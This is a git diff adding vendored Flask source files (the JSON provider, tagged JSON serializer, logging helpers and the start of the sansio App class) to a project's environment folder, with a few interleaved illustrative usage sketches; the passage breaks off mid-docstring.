+ + Either positional or keyword arguments can be given, not both. + If no arguments are given, ``None`` is serialized. + + :param args: A single value to serialize, or multiple values to + treat as a list to serialize. + :param kwargs: Treat as a dict to serialize. + """ + obj = self._prepare_response_obj(args, kwargs) + return self._app.response_class(self.dumps(obj), mimetype="application/json") + + +def _default(o: t.Any) -> t.Any: + if isinstance(o, date): + return http_date(o) + + if isinstance(o, (decimal.Decimal, uuid.UUID)): + return str(o) + + if dataclasses and dataclasses.is_dataclass(o): + return dataclasses.asdict(o) + + if hasattr(o, "__html__"): + return str(o.__html__()) + + raise TypeError(f"Object of type {type(o).__name__} is not JSON serializable") + + +class DefaultJSONProvider(JSONProvider): + """Provide JSON operations using Python's built-in :mod:`json` + library. Serializes the following additional data types: + + - :class:`datetime.datetime` and :class:`datetime.date` are + serialized to :rfc:`822` strings. This is the same as the HTTP + date format. + - :class:`uuid.UUID` is serialized to a string. + - :class:`dataclasses.dataclass` is passed to + :func:`dataclasses.asdict`. + - :class:`~markupsafe.Markup` (or any object with a ``__html__`` + method) will call the ``__html__`` method to get a string. + """ + + default: t.Callable[[t.Any], t.Any] = staticmethod( + _default + ) # type: ignore[assignment] + """Apply this function to any object that :meth:`json.dumps` does + not know how to serialize. It should return a valid JSON type or + raise a ``TypeError``. + """ + + ensure_ascii = True + """Replace non-ASCII characters with escape sequences. This may be + more compatible with some clients, but can be disabled for better + performance and size. + """ + + sort_keys = True + """Sort the keys in any serialized dicts. This may be useful for + some caching situations, but can be disabled for better performance. + When enabled, keys must all be strings, they are not converted + before sorting. + """ + + compact: bool | None = None + """If ``True``, or ``None`` out of debug mode, the :meth:`response` + output will not add indentation, newlines, or spaces. If ``False``, + or ``None`` in debug mode, it will use a non-compact representation. + """ + + mimetype = "application/json" + """The mimetype set in :meth:`response`.""" + + def dumps(self, obj: t.Any, **kwargs: t.Any) -> str: + """Serialize data as JSON to a string. + + Keyword arguments are passed to :func:`json.dumps`. Sets some + parameter defaults from the :attr:`default`, + :attr:`ensure_ascii`, and :attr:`sort_keys` attributes. + + :param obj: The data to serialize. + :param kwargs: Passed to :func:`json.dumps`. + """ + kwargs.setdefault("default", self.default) + kwargs.setdefault("ensure_ascii", self.ensure_ascii) + kwargs.setdefault("sort_keys", self.sort_keys) + return json.dumps(obj, **kwargs) + + def loads(self, s: str | bytes, **kwargs: t.Any) -> t.Any: + """Deserialize data as JSON from a string or bytes. + + :param s: Text or UTF-8 bytes. + :param kwargs: Passed to :func:`json.loads`. + """ + return json.loads(s, **kwargs) + + def response(self, *args: t.Any, **kwargs: t.Any) -> Response: + """Serialize the given arguments as JSON, and return a + :class:`~flask.Response` object with it. The response mimetype + will be "application/json" and can be changed with + :attr:`mimetype`. + + If :attr:`compact` is ``False`` or debug mode is enabled, the + output will be formatted to be easier to read. 
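# Illustrative sketch (not from the vendored Flask source above): the extra
# types _default() knows about, serialized through the app's default provider.
# Dates become HTTP (RFC 822 style) date strings, Decimal and UUID become
# strings, and dataclasses go through dataclasses.asdict().
import dataclasses
import datetime
import uuid

from flask import Flask


@dataclasses.dataclass
class Item:
    name: str
    qty: int


app = Flask(__name__)
print(app.json.dumps({
    "day": datetime.date(2024, 1, 1),  # "Mon, 01 Jan 2024 00:00:00 GMT"
    "id": uuid.UUID(int=0),            # "00000000-0000-0000-0000-000000000000"
    "item": Item("widget", 2),         # {"name": "widget", "qty": 2}
}))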
+ + Either positional or keyword arguments can be given, not both. + If no arguments are given, ``None`` is serialized. + + :param args: A single value to serialize, or multiple values to + treat as a list to serialize. + :param kwargs: Treat as a dict to serialize. + """ + obj = self._prepare_response_obj(args, kwargs) + dump_args: dict[str, t.Any] = {} + + if (self.compact is None and self._app.debug) or self.compact is False: + dump_args.setdefault("indent", 2) + else: + dump_args.setdefault("separators", (",", ":")) + + return self._app.response_class( + f"{self.dumps(obj, **dump_args)}\n", mimetype=self.mimetype + ) diff --git a/env/Lib/site-packages/flask/json/tag.py b/env/Lib/site-packages/flask/json/tag.py new file mode 100644 index 00000000..91cc4412 --- /dev/null +++ b/env/Lib/site-packages/flask/json/tag.py @@ -0,0 +1,314 @@ +""" +Tagged JSON +~~~~~~~~~~~ + +A compact representation for lossless serialization of non-standard JSON +types. :class:`~flask.sessions.SecureCookieSessionInterface` uses this +to serialize the session data, but it may be useful in other places. It +can be extended to support other types. + +.. autoclass:: TaggedJSONSerializer + :members: + +.. autoclass:: JSONTag + :members: + +Let's see an example that adds support for +:class:`~collections.OrderedDict`. Dicts don't have an order in JSON, so +to handle this we will dump the items as a list of ``[key, value]`` +pairs. Subclass :class:`JSONTag` and give it the new key ``' od'`` to +identify the type. The session serializer processes dicts first, so +insert the new tag at the front of the order since ``OrderedDict`` must +be processed before ``dict``. + +.. code-block:: python + + from flask.json.tag import JSONTag + + class TagOrderedDict(JSONTag): + __slots__ = ('serializer',) + key = ' od' + + def check(self, value): + return isinstance(value, OrderedDict) + + def to_json(self, value): + return [[k, self.serializer.tag(v)] for k, v in iteritems(value)] + + def to_python(self, value): + return OrderedDict(value) + + app.session_interface.serializer.register(TagOrderedDict, index=0) +""" +from __future__ import annotations + +import typing as t +from base64 import b64decode +from base64 import b64encode +from datetime import datetime +from uuid import UUID + +from markupsafe import Markup +from werkzeug.http import http_date +from werkzeug.http import parse_date + +from ..json import dumps +from ..json import loads + + +class JSONTag: + """Base class for defining type tags for :class:`TaggedJSONSerializer`.""" + + __slots__ = ("serializer",) + + #: The tag to mark the serialized object with. If ``None``, this tag is + #: only used as an intermediate step during tagging. + key: str | None = None + + def __init__(self, serializer: TaggedJSONSerializer) -> None: + """Create a tagger for the given serializer.""" + self.serializer = serializer + + def check(self, value: t.Any) -> bool: + """Check if the given value should be tagged by this tag.""" + raise NotImplementedError + + def to_json(self, value: t.Any) -> t.Any: + """Convert the Python object to an object that is a valid JSON type. + The tag will be added later.""" + raise NotImplementedError + + def to_python(self, value: t.Any) -> t.Any: + """Convert the JSON representation back to the correct type. 
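# Note on the OrderedDict example in the module docstring above: it calls
# iteritems(), a Python 2 method that does not exist on Python 3 dicts and is
# not imported anywhere in that snippet; the equivalent iteration is
# value.items(). A corrected sketch of the same custom tag:
from collections import OrderedDict

from flask.json.tag import JSONTag


class TagOrderedDict(JSONTag):
    __slots__ = ()
    key = " od"

    def check(self, value):
        return isinstance(value, OrderedDict)

    def to_json(self, value):
        return [[k, self.serializer.tag(v)] for k, v in value.items()]

    def to_python(self, value):
        return OrderedDict(value)

# Registered exactly as in the docstring, on an existing app:
# app.session_interface.serializer.register(TagOrderedDict, index=0)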
The tag + will already be removed.""" + raise NotImplementedError + + def tag(self, value: t.Any) -> t.Any: + """Convert the value to a valid JSON type and add the tag structure + around it.""" + return {self.key: self.to_json(value)} + + +class TagDict(JSONTag): + """Tag for 1-item dicts whose only key matches a registered tag. + + Internally, the dict key is suffixed with `__`, and the suffix is removed + when deserializing. + """ + + __slots__ = () + key = " di" + + def check(self, value: t.Any) -> bool: + return ( + isinstance(value, dict) + and len(value) == 1 + and next(iter(value)) in self.serializer.tags + ) + + def to_json(self, value: t.Any) -> t.Any: + key = next(iter(value)) + return {f"{key}__": self.serializer.tag(value[key])} + + def to_python(self, value: t.Any) -> t.Any: + key = next(iter(value)) + return {key[:-2]: value[key]} + + +class PassDict(JSONTag): + __slots__ = () + + def check(self, value: t.Any) -> bool: + return isinstance(value, dict) + + def to_json(self, value: t.Any) -> t.Any: + # JSON objects may only have string keys, so don't bother tagging the + # key here. + return {k: self.serializer.tag(v) for k, v in value.items()} + + tag = to_json + + +class TagTuple(JSONTag): + __slots__ = () + key = " t" + + def check(self, value: t.Any) -> bool: + return isinstance(value, tuple) + + def to_json(self, value: t.Any) -> t.Any: + return [self.serializer.tag(item) for item in value] + + def to_python(self, value: t.Any) -> t.Any: + return tuple(value) + + +class PassList(JSONTag): + __slots__ = () + + def check(self, value: t.Any) -> bool: + return isinstance(value, list) + + def to_json(self, value: t.Any) -> t.Any: + return [self.serializer.tag(item) for item in value] + + tag = to_json + + +class TagBytes(JSONTag): + __slots__ = () + key = " b" + + def check(self, value: t.Any) -> bool: + return isinstance(value, bytes) + + def to_json(self, value: t.Any) -> t.Any: + return b64encode(value).decode("ascii") + + def to_python(self, value: t.Any) -> t.Any: + return b64decode(value) + + +class TagMarkup(JSONTag): + """Serialize anything matching the :class:`~markupsafe.Markup` API by + having a ``__html__`` method to the result of that method. Always + deserializes to an instance of :class:`~markupsafe.Markup`.""" + + __slots__ = () + key = " m" + + def check(self, value: t.Any) -> bool: + return callable(getattr(value, "__html__", None)) + + def to_json(self, value: t.Any) -> t.Any: + return str(value.__html__()) + + def to_python(self, value: t.Any) -> t.Any: + return Markup(value) + + +class TagUUID(JSONTag): + __slots__ = () + key = " u" + + def check(self, value: t.Any) -> bool: + return isinstance(value, UUID) + + def to_json(self, value: t.Any) -> t.Any: + return value.hex + + def to_python(self, value: t.Any) -> t.Any: + return UUID(value) + + +class TagDateTime(JSONTag): + __slots__ = () + key = " d" + + def check(self, value: t.Any) -> bool: + return isinstance(value, datetime) + + def to_json(self, value: t.Any) -> t.Any: + return http_date(value) + + def to_python(self, value: t.Any) -> t.Any: + return parse_date(value) + + +class TaggedJSONSerializer: + """Serializer that uses a tag system to compactly represent objects that + are not JSON types. Passed as the intermediate serializer to + :class:`itsdangerous.Serializer`. 
+ + The following extra types are supported: + + * :class:`dict` + * :class:`tuple` + * :class:`bytes` + * :class:`~markupsafe.Markup` + * :class:`~uuid.UUID` + * :class:`~datetime.datetime` + """ + + __slots__ = ("tags", "order") + + #: Tag classes to bind when creating the serializer. Other tags can be + #: added later using :meth:`~register`. + default_tags = [ + TagDict, + PassDict, + TagTuple, + PassList, + TagBytes, + TagMarkup, + TagUUID, + TagDateTime, + ] + + def __init__(self) -> None: + self.tags: dict[str, JSONTag] = {} + self.order: list[JSONTag] = [] + + for cls in self.default_tags: + self.register(cls) + + def register( + self, + tag_class: type[JSONTag], + force: bool = False, + index: int | None = None, + ) -> None: + """Register a new tag with this serializer. + + :param tag_class: tag class to register. Will be instantiated with this + serializer instance. + :param force: overwrite an existing tag. If false (default), a + :exc:`KeyError` is raised. + :param index: index to insert the new tag in the tag order. Useful when + the new tag is a special case of an existing tag. If ``None`` + (default), the tag is appended to the end of the order. + + :raise KeyError: if the tag key is already registered and ``force`` is + not true. + """ + tag = tag_class(self) + key = tag.key + + if key is not None: + if not force and key in self.tags: + raise KeyError(f"Tag '{key}' is already registered.") + + self.tags[key] = tag + + if index is None: + self.order.append(tag) + else: + self.order.insert(index, tag) + + def tag(self, value: t.Any) -> dict[str, t.Any]: + """Convert a value to a tagged representation if necessary.""" + for tag in self.order: + if tag.check(value): + return tag.tag(value) + + return value + + def untag(self, value: dict[str, t.Any]) -> t.Any: + """Convert a tagged representation back to the original type.""" + if len(value) != 1: + return value + + key = next(iter(value)) + + if key not in self.tags: + return value + + return self.tags[key].to_python(value[key]) + + def dumps(self, value: t.Any) -> str: + """Tag the value and dump it to a compact JSON string.""" + return dumps(self.tag(value), separators=(",", ":")) + + def loads(self, value: str) -> t.Any: + """Load data from a JSON string and deserialized any tagged objects.""" + return loads(value, object_hook=self.untag) diff --git a/env/Lib/site-packages/flask/logging.py b/env/Lib/site-packages/flask/logging.py new file mode 100644 index 00000000..b452f71f --- /dev/null +++ b/env/Lib/site-packages/flask/logging.py @@ -0,0 +1,76 @@ +from __future__ import annotations + +import logging +import sys +import typing as t + +from werkzeug.local import LocalProxy + +from .globals import request + +if t.TYPE_CHECKING: # pragma: no cover + from .sansio.app import App + + +@LocalProxy +def wsgi_errors_stream() -> t.TextIO: + """Find the most appropriate error stream for the application. If a request + is active, log to ``wsgi.errors``, otherwise use ``sys.stderr``. + + If you configure your own :class:`logging.StreamHandler`, you may want to + use this for the stream. If you are using file or dict configuration and + can't import this directly, you can refer to it as + ``ext://flask.logging.wsgi_errors_stream``. + """ + return request.environ["wsgi.errors"] if request else sys.stderr + + +def has_level_handler(logger: logging.Logger) -> bool: + """Check if there is a handler in the logging chain that will handle the + given logger's :meth:`effective level <~logging.Logger.getEffectiveLevel>`. 
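# Illustrative sketch (not from the vendored Flask source above): a round trip
# through TaggedJSONSerializer restores the exact Python types that plain JSON
# would otherwise flatten.
from datetime import datetime, timezone
from uuid import uuid4

from flask.json.tag import TaggedJSONSerializer

serializer = TaggedJSONSerializer()
data = {
    "pair": (1, 2),                                    # tuple, not list
    "raw": b"\x00\x01",                                # bytes via base64
    "when": datetime(2024, 1, 1, tzinfo=timezone.utc),
    "id": uuid4(),
}
restored = serializer.loads(serializer.dumps(data))
assert restored["pair"] == (1, 2)
assert restored["raw"] == b"\x00\x01"
assert isinstance(restored["when"], datetime)
assert restored["id"] == data["id"]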
+ """ + level = logger.getEffectiveLevel() + current = logger + + while current: + if any(handler.level <= level for handler in current.handlers): + return True + + if not current.propagate: + break + + current = current.parent # type: ignore + + return False + + +#: Log messages to :func:`~flask.logging.wsgi_errors_stream` with the format +#: ``[%(asctime)s] %(levelname)s in %(module)s: %(message)s``. +default_handler = logging.StreamHandler(wsgi_errors_stream) # type: ignore +default_handler.setFormatter( + logging.Formatter("[%(asctime)s] %(levelname)s in %(module)s: %(message)s") +) + + +def create_logger(app: App) -> logging.Logger: + """Get the Flask app's logger and configure it if needed. + + The logger name will be the same as + :attr:`app.import_name `. + + When :attr:`~flask.Flask.debug` is enabled, set the logger level to + :data:`logging.DEBUG` if it is not set. + + If there is no handler for the logger's effective level, add a + :class:`~logging.StreamHandler` for + :func:`~flask.logging.wsgi_errors_stream` with a basic format. + """ + logger = logging.getLogger(app.name) + + if app.debug and not logger.level: + logger.setLevel(logging.DEBUG) + + if not has_level_handler(logger): + logger.addHandler(default_handler) + + return logger diff --git a/env/Lib/site-packages/flask/py.typed b/env/Lib/site-packages/flask/py.typed new file mode 100644 index 00000000..e69de29b diff --git a/env/Lib/site-packages/flask/sansio/README.md b/env/Lib/site-packages/flask/sansio/README.md new file mode 100644 index 00000000..623ac198 --- /dev/null +++ b/env/Lib/site-packages/flask/sansio/README.md @@ -0,0 +1,6 @@ +# Sansio + +This folder contains code that can be used by alternative Flask +implementations, for example Quart. The code therefore cannot do any +IO, nor be part of a likely IO path. Finally this code cannot use the +Flask globals. diff --git a/env/Lib/site-packages/flask/sansio/app.py b/env/Lib/site-packages/flask/sansio/app.py new file mode 100644 index 00000000..0f7d2cbf --- /dev/null +++ b/env/Lib/site-packages/flask/sansio/app.py @@ -0,0 +1,964 @@ +from __future__ import annotations + +import logging +import os +import sys +import typing as t +from datetime import timedelta +from itertools import chain + +from werkzeug.exceptions import Aborter +from werkzeug.exceptions import BadRequest +from werkzeug.exceptions import BadRequestKeyError +from werkzeug.routing import BuildError +from werkzeug.routing import Map +from werkzeug.routing import Rule +from werkzeug.sansio.response import Response +from werkzeug.utils import cached_property +from werkzeug.utils import redirect as _wz_redirect + +from .. 
import typing as ft +from ..config import Config +from ..config import ConfigAttribute +from ..ctx import _AppCtxGlobals +from ..helpers import _split_blueprint_path +from ..helpers import get_debug_flag +from ..json.provider import DefaultJSONProvider +from ..json.provider import JSONProvider +from ..logging import create_logger +from ..templating import DispatchingJinjaLoader +from ..templating import Environment +from .scaffold import _endpoint_from_view_func +from .scaffold import find_package +from .scaffold import Scaffold +from .scaffold import setupmethod + +if t.TYPE_CHECKING: # pragma: no cover + from werkzeug.wrappers import Response as BaseResponse + from .blueprints import Blueprint + from ..testing import FlaskClient + from ..testing import FlaskCliRunner + +T_shell_context_processor = t.TypeVar( + "T_shell_context_processor", bound=ft.ShellContextProcessorCallable +) +T_teardown = t.TypeVar("T_teardown", bound=ft.TeardownCallable) +T_template_filter = t.TypeVar("T_template_filter", bound=ft.TemplateFilterCallable) +T_template_global = t.TypeVar("T_template_global", bound=ft.TemplateGlobalCallable) +T_template_test = t.TypeVar("T_template_test", bound=ft.TemplateTestCallable) + + +def _make_timedelta(value: timedelta | int | None) -> timedelta | None: + if value is None or isinstance(value, timedelta): + return value + + return timedelta(seconds=value) + + +class App(Scaffold): + """The flask object implements a WSGI application and acts as the central + object. It is passed the name of the module or package of the + application. Once it is created it will act as a central registry for + the view functions, the URL rules, template configuration and much more. + + The name of the package is used to resolve resources from inside the + package or the folder the module is contained in depending on if the + package parameter resolves to an actual python package (a folder with + an :file:`__init__.py` file inside) or a standard module (just a ``.py`` file). + + For more information about resource loading, see :func:`open_resource`. + + Usually you create a :class:`Flask` instance in your main module or + in the :file:`__init__.py` file of your package like this:: + + from flask import Flask + app = Flask(__name__) + + .. admonition:: About the First Parameter + + The idea of the first parameter is to give Flask an idea of what + belongs to your application. This name is used to find resources + on the filesystem, can be used by extensions to improve debugging + information and a lot more. + + So it's important what you provide there. If you are using a single + module, `__name__` is always the correct value. If you however are + using a package, it's usually recommended to hardcode the name of + your package there. + + For example if your application is defined in :file:`yourapplication/app.py` + you should create it with one of the two versions below:: + + app = Flask('yourapplication') + app = Flask(__name__.split('.')[0]) + + Why is that? The application will work even with `__name__`, thanks + to how resources are looked up. However it will make debugging more + painful. Certain extensions can make assumptions based on the + import name of your application. For example the Flask-SQLAlchemy + extension will look for the code in your application that triggered + an SQL query in debug mode. If the import name is not properly set + up, that debugging information is lost. 
(For example it would only + pick up SQL queries in `yourapplication.app` and not + `yourapplication.views.frontend`) + + .. versionadded:: 0.7 + The `static_url_path`, `static_folder`, and `template_folder` + parameters were added. + + .. versionadded:: 0.8 + The `instance_path` and `instance_relative_config` parameters were + added. + + .. versionadded:: 0.11 + The `root_path` parameter was added. + + .. versionadded:: 1.0 + The ``host_matching`` and ``static_host`` parameters were added. + + .. versionadded:: 1.0 + The ``subdomain_matching`` parameter was added. Subdomain + matching needs to be enabled manually now. Setting + :data:`SERVER_NAME` does not implicitly enable it. + + :param import_name: the name of the application package + :param static_url_path: can be used to specify a different path for the + static files on the web. Defaults to the name + of the `static_folder` folder. + :param static_folder: The folder with static files that is served at + ``static_url_path``. Relative to the application ``root_path`` + or an absolute path. Defaults to ``'static'``. + :param static_host: the host to use when adding the static route. + Defaults to None. Required when using ``host_matching=True`` + with a ``static_folder`` configured. + :param host_matching: set ``url_map.host_matching`` attribute. + Defaults to False. + :param subdomain_matching: consider the subdomain relative to + :data:`SERVER_NAME` when matching routes. Defaults to False. + :param template_folder: the folder that contains the templates that should + be used by the application. Defaults to + ``'templates'`` folder in the root path of the + application. + :param instance_path: An alternative instance path for the application. + By default the folder ``'instance'`` next to the + package or module is assumed to be the instance + path. + :param instance_relative_config: if set to ``True`` relative filenames + for loading the config are assumed to + be relative to the instance path instead + of the application root. + :param root_path: The path to the root of the application files. + This should only be set manually when it can't be detected + automatically, such as for namespace packages. + """ + + #: The class of the object assigned to :attr:`aborter`, created by + #: :meth:`create_aborter`. That object is called by + #: :func:`flask.abort` to raise HTTP errors, and can be + #: called directly as well. + #: + #: Defaults to :class:`werkzeug.exceptions.Aborter`. + #: + #: .. versionadded:: 2.2 + aborter_class = Aborter + + #: The class that is used for the Jinja environment. + #: + #: .. versionadded:: 0.11 + jinja_environment = Environment + + #: The class that is used for the :data:`~flask.g` instance. + #: + #: Example use cases for a custom class: + #: + #: 1. Store arbitrary attributes on flask.g. + #: 2. Add a property for lazy per-request database connectors. + #: 3. Return None instead of AttributeError on unexpected attributes. + #: 4. Raise exception if an unexpected attr is set, a "controlled" flask.g. + #: + #: In Flask 0.9 this property was called `request_globals_class` but it + #: was changed in 0.10 to :attr:`app_ctx_globals_class` because the + #: flask.g object is now application context scoped. + #: + #: .. versionadded:: 0.10 + app_ctx_globals_class = _AppCtxGlobals + + #: The class that is used for the ``config`` attribute of this app. + #: Defaults to :class:`~flask.Config`. + #: + #: Example use cases for a custom class: + #: + #: 1. Default values for certain config options. + #: 2. 
Access to config values through attributes in addition to keys. + #: + #: .. versionadded:: 0.11 + config_class = Config + + #: The testing flag. Set this to ``True`` to enable the test mode of + #: Flask extensions (and in the future probably also Flask itself). + #: For example this might activate test helpers that have an + #: additional runtime cost which should not be enabled by default. + #: + #: If this is enabled and PROPAGATE_EXCEPTIONS is not changed from the + #: default it's implicitly enabled. + #: + #: This attribute can also be configured from the config with the + #: ``TESTING`` configuration key. Defaults to ``False``. + testing = ConfigAttribute("TESTING") + + #: If a secret key is set, cryptographic components can use this to + #: sign cookies and other things. Set this to a complex random value + #: when you want to use the secure cookie for instance. + #: + #: This attribute can also be configured from the config with the + #: :data:`SECRET_KEY` configuration key. Defaults to ``None``. + secret_key = ConfigAttribute("SECRET_KEY") + + #: A :class:`~datetime.timedelta` which is used to set the expiration + #: date of a permanent session. The default is 31 days which makes a + #: permanent session survive for roughly one month. + #: + #: This attribute can also be configured from the config with the + #: ``PERMANENT_SESSION_LIFETIME`` configuration key. Defaults to + #: ``timedelta(days=31)`` + permanent_session_lifetime = ConfigAttribute( + "PERMANENT_SESSION_LIFETIME", get_converter=_make_timedelta + ) + + json_provider_class: type[JSONProvider] = DefaultJSONProvider + """A subclass of :class:`~flask.json.provider.JSONProvider`. An + instance is created and assigned to :attr:`app.json` when creating + the app. + + The default, :class:`~flask.json.provider.DefaultJSONProvider`, uses + Python's built-in :mod:`json` library. A different provider can use + a different JSON library. + + .. versionadded:: 2.2 + """ + + #: Options that are passed to the Jinja environment in + #: :meth:`create_jinja_environment`. Changing these options after + #: the environment is created (accessing :attr:`jinja_env`) will + #: have no effect. + #: + #: .. versionchanged:: 1.1.0 + #: This is a ``dict`` instead of an ``ImmutableDict`` to allow + #: easier configuration. + #: + jinja_options: dict = {} + + #: The rule object to use for URL rules created. This is used by + #: :meth:`add_url_rule`. Defaults to :class:`werkzeug.routing.Rule`. + #: + #: .. versionadded:: 0.7 + url_rule_class = Rule + + #: The map object to use for storing the URL rules and routing + #: configuration parameters. Defaults to :class:`werkzeug.routing.Map`. + #: + #: .. versionadded:: 1.1.0 + url_map_class = Map + + #: The :meth:`test_client` method creates an instance of this test + #: client class. Defaults to :class:`~flask.testing.FlaskClient`. + #: + #: .. versionadded:: 0.7 + test_client_class: type[FlaskClient] | None = None + + #: The :class:`~click.testing.CliRunner` subclass, by default + #: :class:`~flask.testing.FlaskCliRunner` that is used by + #: :meth:`test_cli_runner`. Its ``__init__`` method should take a + #: Flask app object as the first argument. + #: + #: .. 
versionadded:: 1.0 + test_cli_runner_class: type[FlaskCliRunner] | None = None + + default_config: dict + response_class: type[Response] + + def __init__( + self, + import_name: str, + static_url_path: str | None = None, + static_folder: str | os.PathLike | None = "static", + static_host: str | None = None, + host_matching: bool = False, + subdomain_matching: bool = False, + template_folder: str | os.PathLike | None = "templates", + instance_path: str | None = None, + instance_relative_config: bool = False, + root_path: str | None = None, + ): + super().__init__( + import_name=import_name, + static_folder=static_folder, + static_url_path=static_url_path, + template_folder=template_folder, + root_path=root_path, + ) + + if instance_path is None: + instance_path = self.auto_find_instance_path() + elif not os.path.isabs(instance_path): + raise ValueError( + "If an instance path is provided it must be absolute." + " A relative path was given instead." + ) + + #: Holds the path to the instance folder. + #: + #: .. versionadded:: 0.8 + self.instance_path = instance_path + + #: The configuration dictionary as :class:`Config`. This behaves + #: exactly like a regular dictionary but supports additional methods + #: to load a config from files. + self.config = self.make_config(instance_relative_config) + + #: An instance of :attr:`aborter_class` created by + #: :meth:`make_aborter`. This is called by :func:`flask.abort` + #: to raise HTTP errors, and can be called directly as well. + #: + #: .. versionadded:: 2.2 + #: Moved from ``flask.abort``, which calls this object. + self.aborter = self.make_aborter() + + self.json: JSONProvider = self.json_provider_class(self) + """Provides access to JSON methods. Functions in ``flask.json`` + will call methods on this provider when the application context + is active. Used for handling JSON requests and responses. + + An instance of :attr:`json_provider_class`. Can be customized by + changing that attribute on a subclass, or by assigning to this + attribute afterwards. + + The default, :class:`~flask.json.provider.DefaultJSONProvider`, + uses Python's built-in :mod:`json` library. A different provider + can use a different JSON library. + + .. versionadded:: 2.2 + """ + + #: A list of functions that are called by + #: :meth:`handle_url_build_error` when :meth:`.url_for` raises a + #: :exc:`~werkzeug.routing.BuildError`. Each function is called + #: with ``error``, ``endpoint`` and ``values``. If a function + #: returns ``None`` or raises a ``BuildError``, it is skipped. + #: Otherwise, its return value is returned by ``url_for``. + #: + #: .. versionadded:: 0.9 + self.url_build_error_handlers: list[ + t.Callable[[Exception, str, dict[str, t.Any]], str] + ] = [] + + #: A list of functions that are called when the application context + #: is destroyed. Since the application context is also torn down + #: if the request ends this is the place to store code that disconnects + #: from databases. + #: + #: .. versionadded:: 0.9 + self.teardown_appcontext_funcs: list[ft.TeardownCallable] = [] + + #: A list of shell context processor functions that should be run + #: when a shell context is created. + #: + #: .. versionadded:: 0.11 + self.shell_context_processors: list[ft.ShellContextProcessorCallable] = [] + + #: Maps registered blueprint names to blueprint objects. The + #: dict retains the order the blueprints were registered in. + #: Blueprints can be registered multiple times, this dict does + #: not track how often they were attached. + #: + #: .. 
versionadded:: 0.7 + self.blueprints: dict[str, Blueprint] = {} + + #: a place where extensions can store application specific state. For + #: example this is where an extension could store database engines and + #: similar things. + #: + #: The key must match the name of the extension module. For example in + #: case of a "Flask-Foo" extension in `flask_foo`, the key would be + #: ``'foo'``. + #: + #: .. versionadded:: 0.7 + self.extensions: dict = {} + + #: The :class:`~werkzeug.routing.Map` for this instance. You can use + #: this to change the routing converters after the class was created + #: but before any routes are connected. Example:: + #: + #: from werkzeug.routing import BaseConverter + #: + #: class ListConverter(BaseConverter): + #: def to_python(self, value): + #: return value.split(',') + #: def to_url(self, values): + #: return ','.join(super(ListConverter, self).to_url(value) + #: for value in values) + #: + #: app = Flask(__name__) + #: app.url_map.converters['list'] = ListConverter + self.url_map = self.url_map_class(host_matching=host_matching) + + self.subdomain_matching = subdomain_matching + + # tracks internally if the application already handled at least one + # request. + self._got_first_request = False + + # Set the name of the Click group in case someone wants to add + # the app's commands to another CLI tool. + self.cli.name = self.name + + def _check_setup_finished(self, f_name: str) -> None: + if self._got_first_request: + raise AssertionError( + f"The setup method '{f_name}' can no longer be called" + " on the application. It has already handled its first" + " request, any changes will not be applied" + " consistently.\n" + "Make sure all imports, decorators, functions, etc." + " needed to set up the application are done before" + " running it." + ) + + @cached_property + def name(self) -> str: # type: ignore + """The name of the application. This is usually the import name + with the difference that it's guessed from the run file if the + import name is main. This name is used as a display name when + Flask needs the name of the application. It can be set and overridden + to change the value. + + .. versionadded:: 0.8 + """ + if self.import_name == "__main__": + fn = getattr(sys.modules["__main__"], "__file__", None) + if fn is None: + return "__main__" + return os.path.splitext(os.path.basename(fn))[0] + return self.import_name + + @cached_property + def logger(self) -> logging.Logger: + """A standard Python :class:`~logging.Logger` for the app, with + the same name as :attr:`name`. + + In debug mode, the logger's :attr:`~logging.Logger.level` will + be set to :data:`~logging.DEBUG`. + + If there are no handlers configured, a default handler will be + added. See :doc:`/logging` for more information. + + .. versionchanged:: 1.1.0 + The logger takes the same name as :attr:`name` rather than + hard-coding ``"flask.app"``. + + .. versionchanged:: 1.0.0 + Behavior was simplified. The logger is always named + ``"flask.app"``. The level is only set during configuration, + it doesn't check ``app.debug`` each time. Only one format is + used, not different ones depending on ``app.debug``. No + handlers are removed, and a handler is only added if no + handlers are already configured. + + .. versionadded:: 0.3 + """ + return create_logger(self) + + @cached_property + def jinja_env(self) -> Environment: + """The Jinja environment used to load templates. + + The environment is created the first time this property is + accessed. 
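# Illustrative sketch (not from the vendored Flask source above): attributes
# such as secret_key, testing, and permanent_session_lifetime are
# ConfigAttribute descriptors, so they read and write app.config, and the
# session lifetime is passed through _make_timedelta so plain seconds work.
from datetime import timedelta

from flask import Flask

app = Flask(__name__)
app.secret_key = "dev"                             # same as config["SECRET_KEY"]
app.config["PERMANENT_SESSION_LIFETIME"] = 3600    # int seconds is accepted

assert app.config["SECRET_KEY"] == "dev"
assert app.permanent_session_lifetime == timedelta(seconds=3600)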
Changing :attr:`jinja_options` after that will have no + effect. + """ + return self.create_jinja_environment() + + def create_jinja_environment(self) -> Environment: + raise NotImplementedError() + + def make_config(self, instance_relative: bool = False) -> Config: + """Used to create the config attribute by the Flask constructor. + The `instance_relative` parameter is passed in from the constructor + of Flask (there named `instance_relative_config`) and indicates if + the config should be relative to the instance path or the root path + of the application. + + .. versionadded:: 0.8 + """ + root_path = self.root_path + if instance_relative: + root_path = self.instance_path + defaults = dict(self.default_config) + defaults["DEBUG"] = get_debug_flag() + return self.config_class(root_path, defaults) + + def make_aborter(self) -> Aborter: + """Create the object to assign to :attr:`aborter`. That object + is called by :func:`flask.abort` to raise HTTP errors, and can + be called directly as well. + + By default, this creates an instance of :attr:`aborter_class`, + which defaults to :class:`werkzeug.exceptions.Aborter`. + + .. versionadded:: 2.2 + """ + return self.aborter_class() + + def auto_find_instance_path(self) -> str: + """Tries to locate the instance path if it was not provided to the + constructor of the application class. It will basically calculate + the path to a folder named ``instance`` next to your main file or + the package. + + .. versionadded:: 0.8 + """ + prefix, package_path = find_package(self.import_name) + if prefix is None: + return os.path.join(package_path, "instance") + return os.path.join(prefix, "var", f"{self.name}-instance") + + def create_global_jinja_loader(self) -> DispatchingJinjaLoader: + """Creates the loader for the Jinja2 environment. Can be used to + override just the loader and keeping the rest unchanged. It's + discouraged to override this function. Instead one should override + the :meth:`jinja_loader` function instead. + + The global loader dispatches between the loaders of the application + and the individual blueprints. + + .. versionadded:: 0.7 + """ + return DispatchingJinjaLoader(self) + + def select_jinja_autoescape(self, filename: str) -> bool: + """Returns ``True`` if autoescaping should be active for the given + template name. If no template name is given, returns `True`. + + .. versionchanged:: 2.2 + Autoescaping is now enabled by default for ``.svg`` files. + + .. versionadded:: 0.5 + """ + if filename is None: + return True + return filename.endswith((".html", ".htm", ".xml", ".xhtml", ".svg")) + + @property + def debug(self) -> bool: + """Whether debug mode is enabled. When using ``flask run`` to start the + development server, an interactive 